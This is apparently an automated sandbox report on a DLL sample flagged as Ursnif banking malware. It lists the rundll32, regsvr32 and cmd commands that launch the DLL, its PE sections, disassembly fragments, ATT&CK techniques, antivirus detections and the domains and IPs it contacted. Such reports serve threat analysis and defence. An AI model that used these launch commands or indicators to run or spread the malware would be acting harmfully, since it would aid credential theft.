            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Swampland
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Subarachnoid
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Bechained
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Unforeseenness
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Incrimination
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82950 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Oversystematic
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17432 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Shieldless
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Tsarevitch
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Torchbearer
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Moler
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Hyperpigmented
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17436 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Adipous
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Undazzled
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17446 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Peckishness
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82994 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17448 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:4876 CREDAT:345098 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Musophagidae
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Impracticability
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\direction.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Opisthotonos
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Hydrazo
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Overlock
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Automobilist
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Swampland
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Subarachnoid
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Bechained
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Unforeseenness
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Incrimination
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Oversystematic
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Shieldless
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Tsarevitch
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Torchbearer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Moler
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Hyperpigmented
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Adipous
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Undazzled
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82950 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17432 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17436 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17446 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001BAC LoadLibraryA,GetProcAddress,0_2_10001BAC
            Source: direction.dllStatic PE information: real checksum: 0x44eb9 should be: 0x40da6
            Source: direction.dllStatic PE information: section name: .unsooth
            Source: direction.dllStatic PE information: section name: .prekind
            Source: direction.dllStatic PE information: section name: .aqueoig
            Source: direction.dllStatic PE information: section name: .spiritr
            Source: direction.dllStatic PE information: section name: .nectaro
            Source: direction.dllStatic PE information: section name: .philolo
            Source: direction.dllStatic PE information: section name: .pres
            Source: direction.dllStatic PE information: section name: .outglad
            Source: direction.dllStatic PE information: section name: .pogonir
            Source: direction.dllStatic PE information: section name: .taurico
            Source: direction.dllStatic PE information: section name: .untar
            Source: direction.dllStatic PE information: section name: .muskroo
            Source: direction.dllStatic PE information: section name: .cricoto
            Source: direction.dllStatic PE information: section name: .breaghe
            Source: direction.dllStatic PE information: section name: .shunnab
            Source: direction.dllStatic PE information: section name: .hemaut
            Source: direction.dllStatic PE information: section name: .uncongr
            Source: direction.dllStatic PE information: section name: .tonner
            Source: direction.dllStatic PE information: section name: .jink
            Source: direction.dllStatic PE information: section name: .stirles
            Source: direction.dllStatic PE information: section name: .imper
            Source: direction.dllStatic PE information: section name: .unsubve
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10000083 push eax; iretd 0_2_100000B2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002120 push ecx; ret 0_2_10002129
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002173 push ecx; ret 0_2_10002183
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EE458 push ds; retf 0_2_005EE47A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EE0C7 push cs; ret 0_2_005EE0C8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EAF6F push ecx; ret 0_2_005EAF7F
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EE163 push edx; iretd 0_2_005EE164
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EABC0 push ecx; ret 0_2_005EABC9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0304 push dword ptr [ebp-00000280h]; ret 0_2_003D0373
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0478 push dword ptr [ebp-00000280h]; ret 0_2_003D04AE
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D04AF push dword ptr [ebp-00000280h]; ret 0_2_003D065D
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D04AF push dword ptr [ebp-00000288h]; ret 0_2_003D06B1
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D04AF push dword ptr [esp+10h]; ret 0_2_003D07C7
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D02D2 push dword ptr [ebp-00000280h]; ret 0_2_003D0477
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D07C8 push dword ptr [esp+0Ch]; ret 0_2_003D07DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D07C8 push dword ptr [esp+10h]; ret 0_2_003D0822
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047FAF6F push ecx; ret 2_2_047FAF7F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047FABC0 push ecx; ret 2_2_047FABC9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F202D2 push dword ptr [ebp-00000280h]; ret 2_2_02F20477
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F204AF push dword ptr [ebp-00000280h]; ret 2_2_02F2065D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F204AF push dword ptr [ebp-00000288h]; ret 2_2_02F206B1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F204AF push dword ptr [esp+10h]; ret 2_2_02F207C7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F20478 push dword ptr [ebp-00000280h]; ret 2_2_02F204AE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F207C8 push dword ptr [esp+0Ch]; ret 2_2_02F207DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F207C8 push dword ptr [esp+10h]; ret 2_2_02F20822
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F20304 push dword ptr [ebp-00000280h]; ret 2_2_02F20373
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0447AF6F push ecx; ret 4_2_0447AF7F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0447ABC0 push ecx; ret 4_2_0447ABC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C0ABC0 push ecx; ret 6_2_04C0ABC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C0AF6F push ecx; ret 6_2_04C0AF7F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C0478 push dword ptr [ebp-00000280h]; ret 6_2_027C04AE

            Boot Survival:

            Creates an undocumented autostart registry key
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser ITBar7Layout

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6912, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6096, type: MEMORY
            Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4448Thread sleep time: -1667865539s >= -30000s
            Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0823 mov eax, dword ptr fs:[00000030h]0_2_003D0823
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D08B4 mov eax, dword ptr fs:[00000030h]0_2_003D08B4
            Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
            Source: loaddll32.exe, 00000000.00000002.486059210.0000000001A10000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.486678492.0000000003310000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.485974841.0000000002FA0000.00000002.00000001.sdmp; Binary or memory string: Program Manager
            Source: loaddll32.exe, 00000000.00000002.486059210.0000000001A10000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.486678492.0000000003310000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.485974841.0000000002FA0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.486059210.0000000001A10000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.486678492.0000000003310000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.485974841.0000000002FA0000.00000002.00000001.sdmp; Binary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.486059210.0000000001A10000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.486678492.0000000003310000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.485974841.0000000002FA0000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_005E9135 cpuid
            Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_10001456 SetThreadPriority, GetSystemTime, SwitchToThread, Sleep, GetLongPathNameW, GetLongPathNameW, GetLongPathNameW, GetLastError, WaitForSingleObject, GetExitCodeThread, CloseHandle, GetLastError, GetLastError
            Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_005E9135 RtlAllocateHeap, GetUserNameW, RtlAllocateHeap, GetUserNameW, HeapFree, GetComputerNameW, GetComputerNameW, RtlAllocateHeap, GetComputerNameW, HeapFree
            Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_10001F0E CreateEventA, GetVersion, GetCurrentProcessId, OpenProcess, GetLastError

            Stealing of Sensitive Information:

            Yara detected Ursnif

            Remote Access Functionality:

            Yara detected Ursnif

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 2 | Registry Run Keys / Startup Folder 1 | Process Injection 12 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Native API 1 | DLL Side-Loading 1 | Registry Run Keys / Startup Folder 1 | Virtualization/Sandbox Evasion 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading 1 | Process Injection 12 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr32 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 1 | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | System Information Discovery 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Behavior graph image not reproduced. Behavior Graph ID: 454630; Sample: direction.dll; Startdate: 27/07/2021; Architecture: WINDOWS; Score: 76]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            direction.dll | 23% | Virustotal |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            0.2.loaddll32.exe.5e0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            37.2.rundll32.exe.4950000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            2.2.regsvr32.exe.10000000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
            9.2.rundll32.exe.4630000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            13.2.rundll32.exe.4970000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            2.2.regsvr32.exe.47f0000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            33.2.rundll32.exe.4670000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            6.2.rundll32.exe.4c00000.3.unpack | 100% | Avira | HEUR/AGEN.1108168
            4.2.rundll32.exe.10000000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
            29.2.rundll32.exe.5100000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            4.2.rundll32.exe.4470000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            0.2.loaddll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
            36.2.rundll32.exe.4e90000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
            35.2.rundll32.exe.2b90000.2.unpack | 100% | Avira | HEUR/AGEN.1108168

            Domains

            No Antivirus matches

            URLs


            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            contextual.media.net | 23.211.6.95 | true | false | | high
            alliancer.bar | 162.255.119.245 | true | false | | high
            dart.l.doubleclick.net | 142.250.186.70 | true | false | | high
            tls13.taboola.map.fastly.net | 151.101.1.44 | true | false | | high
            hblg.media.net | 23.211.6.95 | true | false | | high
            allianceline.bar | 162.255.119.73 | true | false | | high
            parkingpage.namecheap.com | 198.54.117.218 | true | false | | high
            lg3.media.net | 23.211.6.95 | true | false | | high
            btloader.com | 172.67.70.134 | true | false | | high
            geolocation.onetrust.com | 104.20.185.68 | true | false | | high
            ad-delivery.net | 172.67.69.19 | true | false | | high
            alliances.bar | 195.110.59.2 | true | false | | high
            www.msn.com | unknown | unknown | false | | high
            ad.doubleclick.net | unknown | unknown | false | | high
            srtb.msn.com | unknown | unknown | false | | high
            img.img-taboola.com | unknown | unknown | false | | high
            www.allianceline.bar | unknown | unknown | false | | high
            web.vortex.data.msn.com | unknown | unknown | false | | high
            www.alliancer.bar | unknown | unknown | false | | high
            cvision.media.net | unknown | unknown | false | | high

                                                    Contacted URLs


                                                    URLs from Memory and Binaries


                                                    Contacted IPs


                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
195.110.59.2 | alliances.bar | Lithuania | 47583 | AS-HOSTINGERLT | false
172.67.69.19 | ad-delivery.net | United States | 13335 | CLOUDFLARENETUS | false
151.101.1.44 | tls13.taboola.map.fastly.net | United States | 54113 | FASTLYUS | false
104.20.185.68 | geolocation.onetrust.com | United States | 13335 | CLOUDFLARENETUS | false
172.67.70.134 | btloader.com | United States | 13335 | CLOUDFLARENETUS | false
142.250.186.70 | dart.l.doubleclick.net | United States | 15169 | GOOGLEUS | false

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:454630
                                                    Start date:27.07.2021
                                                    Start time:10:54:47
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 14m 46s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:direction.dll
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:50
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal76.troj.winDLL@72/174@25/6
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 87.7% (good quality ratio 83.1%)
                                                    • Quality average: 79%
                                                    • Quality standard deviation: 29.2%
                                                    HCA Information:
                                                    • Successful, ratio: 94%
                                                    • Number of executed functions: 146
                                                    • Number of non-executed functions: 259
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .dll
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 13.88.21.125, 13.64.90.137, 104.43.139.144, 23.203.80.193, 131.253.33.203, 131.253.33.200, 13.107.22.200, 80.67.82.209, 80.67.82.240, 65.55.44.109, 23.211.6.95, 13.107.40.203, 23.211.4.86, 152.199.19.161, 20.82.210.154, 93.184.221.240, 80.67.82.235, 80.67.82.211, 40.112.88.60
                                                    • Excluded domains from analysis (whitelisted): signin.microsoft.com, a-0003.fbs2-a-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                                    • Not all processes were analyzed; the report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
10:55:58 | API Interceptor | 1x Sleep call for process: regsvr32.exe modified
10:56:10 | API Interceptor | 5x Sleep call for process: rundll32.exe modified
10:57:17 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\1JYDDI8A\www.msn[1].xml
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):152
                                                    Entropy (8bit):5.157520317739895
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <root></root><root><item name="BT_AA_DETECTION" value="{&quot;ab&quot;:false,&quot;acceptable&quot;:true}" ltime="2720955632" htime="30901008" /></root>
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\580K31Y9\contextual.media[1].xml
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):2008
                                                    Entropy (8bit):4.879538883267568
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D924C228-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):477688
                                                    Entropy (8bit):2.7157383836456748
                                                    Encrypted:false
                                                    Malicious:false
                                                    Reputation:unknown
